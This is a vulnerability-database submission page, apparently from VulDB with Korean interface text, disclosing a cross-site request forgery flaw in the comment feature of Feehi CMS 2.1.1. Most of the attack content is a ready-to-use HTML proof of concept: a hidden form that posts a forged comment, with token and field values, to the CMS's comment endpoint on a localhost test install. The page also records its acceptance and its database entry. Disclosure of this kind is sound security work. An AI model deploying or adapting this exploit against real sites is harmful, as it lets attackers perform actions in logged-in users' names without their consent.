제출 #52189: Feehi Cms 2.1.1 Csrf Vulnerability Exploit정보

제목Feehi Cms 2.1.1 Csrf Vulnerability Exploit
설명# Google Dork: [not applicable] # Date: 14082022 # Exploit Author: haruntamokur # Vendor Homepage: https://feehi.com/ # Software Link: https://github.com/liufee/cms # Version: 2.1.1 (REQUIRED) # Tested on: Windows 10 # CVE : [not applicable] When you log in application with user and password, you reach “Post my comment” tab. The function has Csrf exploit. If you write exploit code like following, you can exploit this vulnerability. URL: http://localhost:8080/index.php?r=article%2Fview&id=22#comment-7 Exploit Code <html> <body> <script>history.pushState('', '', '/')</script> <form action="http://localhost:8080/index.php?r=article%2Fcomment" method="POST"> <input type="hidden" name="&#95;csrf" value="5EgNi95Un03ZlbGkl3dj2u&#95;lxkDWSlBLz0h4q&#95;&#95;4to&#45;rMUHNl2bxCJ2h4calBlacv7&#95;2NqAdJBmpDxKYmsmCuA&#61;&#61;" /> <input type="hidden" name="Comment&#91;aid&#93;" value="22" /> <input type="hidden" name="Comment&#91;content&#93;" value="CSRFTest" /> <input type="hidden" name="comment&#95;post&#95;ID" value="114" /> <input type="hidden" name="Comment&#91;reply&#95;to&#93;" value="0" /> <input type="hidden" name="akismet&#95;comment&#95;nonce" value="32920dc775" /> <input type="hidden" name="ak&#95;js" value="101" /> <input type="hidden" name="comment&#95;mail&#95;notify" value="comment&#95;mail&#95;notify" /> <input type="hidden" name="Comment&#91;nickname&#93;" value="harun" /> <input type="hidden" name="Comment&#91;email&#93;" value="" /> <input type="hidden" name="Comment&#91;website&#95;url&#93;" value="" /> <input type="submit" value="Submit request" /> </form> </body> </html>
사용자
 harun.tamokur (UID 35839)
제출2022. 11. 15. AM 11:45 (4 연령 ago)
모더레이션2022. 11. 16. AM 08:53 (21 hours later)
상태수락
VulDB 항목213788 [FeehiCMS Post My Comment Tab 교차 사이트 요청 위조]
포인트들17

Want to know what is going to be exploited?

We predict KEV entries!